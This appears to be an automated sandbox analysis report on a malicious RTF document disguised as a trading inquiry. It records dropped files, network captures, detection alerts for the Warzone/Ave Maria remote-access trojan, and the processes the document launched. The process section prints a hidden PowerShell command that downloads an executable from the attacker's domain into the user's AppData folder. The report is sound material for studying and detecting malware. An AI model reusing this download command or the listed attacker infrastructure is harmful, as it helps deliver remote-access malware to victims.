                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):974336
                    Entropy (8bit):6.592752877706246
                    Encrypted:false
                    SSDEEP:12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
                    MD5:87B246B26208A9831A4372664C518C2C
                    SHA1:1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
                    SHA-256:27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
                    SHA-512:4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.....*..0...........s......o......(.....*...0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):974336
                    Entropy (8bit):6.592752877706246
                    Encrypted:false
                    SSDEEP:12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
                    MD5:87B246B26208A9831A4372664C518C2C
                    SHA1:1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
                    SHA-256:27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
                    SHA-512:4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.....*..0...........s......o......(.....*...0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                    MD5:7CFA404FD881AF8DF49EA584FE153C61
                    SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                    SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                    SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                    File type:Rich Text Format data, version 1, unknown character set
                    Entropy (8bit):3.0298782156742794
                    TrID:
                    • Rich Text Format (5005/1) 55.56%
                    • Rich Text Format (4004/1) 44.44%
                    File name:Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
                    File size:221545
                    MD5:9bc102ffb0930f5dee65bde8e0ba6d89
                    SHA1:37cac7507a6ad02a75d947a9bdfe115f2da8b71b
                    SHA256:959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
                    SHA512:acdb50e95c30e14b235a89ed4a86531a64c1c3246b3d65a116a80e64a6f9d061c7a2dc784b9942cf1beb5d7fbdd6302139347a490886386d54c0dc372404e0fd
                    SSDEEP:1536:9mDDRxjrfUG7NP0UlAD8KEmt09N/FUr1nvX+EEFZVzFz76mAg5eeVhMDw5wfLz:94F1lVzFtr5RDAw5wfP
                    TLSH:5824B9B4694F08B2C309DC1E25A87655AE79FEA374C154B223AFE034CF5ABF29EC4541
                    File Content Preview:{\rtf1\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c667364
                    Icon Hash:e4eea2aaa4b4b4a4
                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                    0000007D1h2embeddedpackage15065DZdtfhgYgeghD{.scTC:\osdsTggH\DZdtfhgYgeghD{.scTC:\9jkepaD\DZdtfhgYgeghD{.scTno
                    100008329h2embeddedOLE2LInk2560no
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    20.126.95.155192.168.2.227800491732852329 09/23/22-08:15:52.235686TCP2852329ETPRO TROJAN Ave Maria/Warzone RAT PingCommand78004917320.126.95.155192.168.2.22
                    20.126.95.155192.168.2.227800491732852326 09/23/22-08:15:32.226881TCP2852326ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket78004917320.126.95.155192.168.2.22
                    192.168.2.2220.126.95.1554917378002852328 09/23/22-08:15:32.237815TCP2852328ETPRO TROJAN Ave Maria/Warzone RAT PingResponse491737800192.168.2.2220.126.95.155
                    20.126.95.155192.168.2.227800491732036735 09/23/22-08:13:32.180190TCP2036735ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)78004917320.126.95.155192.168.2.22
                    192.168.2.2220.126.95.1554917378002036734 09/23/22-08:15:32.237815TCP2036734ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin491737800192.168.2.2220.126.95.155
                    192.168.2.2220.126.95.1554917378002852327 09/23/22-08:13:32.470320TCP2852327ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse491737800192.168.2.2220.126.95.155
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 23, 2022 08:13:01.808065891 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.839801073 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.839961052 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.840199947 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.870269060 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.870949984 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.870994091 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871057987 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871066093 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871123075 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871141911 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871172905 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871212959 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871246099 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871253967 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871256113 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871282101 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871296883 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871320009 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871339083 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871364117 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871407986 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.871417999 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.871483088 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.875750065 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903110981 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903160095 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903203011 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903204918 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903249025 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903278112 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903285027 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903287888 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903316021 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903328896 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903358936 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903414965 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903453112 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903493881 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903522968 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903544903 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903660059 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903698921 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903738022 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903743029 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903772116 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903779984 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903806925 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903819084 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903845072 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903873920 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.903934002 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903973103 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.903995991 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.904012918 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.904035091 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.904071093 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.904133081 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.904175043 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.904205084 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.904215097 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.904238939 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.904256105 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.904273987 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.904293060 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.905054092 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.933777094 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.933832884 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.933871984 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.933908939 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.933921099 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.933937073 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.933968067 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.933986902 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934010983 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934030056 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934055090 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934072971 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934108973 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934117079 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934150934 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934171915 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934195995 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934216022 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934235096 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934257030 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934274912 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934293032 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934315920 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934338093 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934357882 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934379101 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934400082 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934417963 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934438944 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934463978 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934478045 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934497118 CEST4917180192.168.2.22159.223.2.212
                    Sep 23, 2022 08:13:01.934519053 CEST8049171159.223.2.212192.168.2.22
                    Sep 23, 2022 08:13:01.934541941 CEST4917180192.168.2.22159.223.2.212
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 23, 2022 08:13:01.747231007 CEST5586853192.168.2.228.8.8.8
                    Sep 23, 2022 08:13:01.771946907 CEST53558688.8.8.8192.168.2.22
                    Sep 23, 2022 08:13:05.736835957 CEST4968853192.168.2.228.8.8.8
                    Sep 23, 2022 08:13:05.760781050 CEST53496888.8.8.8192.168.2.22
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Sep 23, 2022 08:13:01.747231007 CEST192.168.2.228.8.8.80xe3a3Standard query (0)login.929389.ankura.usA (IP address)IN (0x0001)false
                    Sep 23, 2022 08:13:05.736835957 CEST192.168.2.228.8.8.80x447aStandard query (0)login.929389.ankura.usA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Sep 23, 2022 08:13:01.771946907 CEST8.8.8.8192.168.2.220xe3a3No error (0)login.929389.ankura.us159.223.2.212A (IP address)IN (0x0001)false
                    Sep 23, 2022 08:13:05.760781050 CEST8.8.8.8192.168.2.220x447aNo error (0)login.929389.ankura.us159.223.2.212A (IP address)IN (0x0001)false
                    • login.929389.ankura.us
                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249171159.223.2.21280C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampkBytes transferredDirectionData
                    Sep 23, 2022 08:13:01.840199947 CEST0OUTGET /AwOgYiWG/explorer.exe HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: login.929389.ankura.us
                    Connection: Keep-Alive
                    Sep 23, 2022 08:13:01.870949984 CEST0INHTTP/1.1 200 OK
                    Content-Type: application/x-msdownload
                    Date: Fri, 23 Sep 2022 06:13:01 GMT
                    Transfer-Encoding: chunked


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.2249172159.223.2.21280C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampkBytes transferredDirectionData
                    Sep 23, 2022 08:13:08.820766926 CEST1038OUTGET /AwOgYiWG/explorer.exe HTTP/1.1
                    Host: login.929389.ankura.us
                    Connection: Keep-Alive
                    Sep 23, 2022 08:13:08.845700026 CEST1038INHTTP/1.1 200 OK
                    Content-Type: application/x-msdownload
                    Date: Fri, 23 Sep 2022 06:13:08 GMT
                    Transfer-Encoding: chunked


                    Click to jump to process

                    Target ID:0
                    Start time:08:13:11
                    Start date:23/09/2022
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f2d0000
                    File size:1423704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:4
                    Start time:08:13:17
                    Start date:23/09/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
                    Imagebase:0x13f8e0000
                    File size:473600 bytes
                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
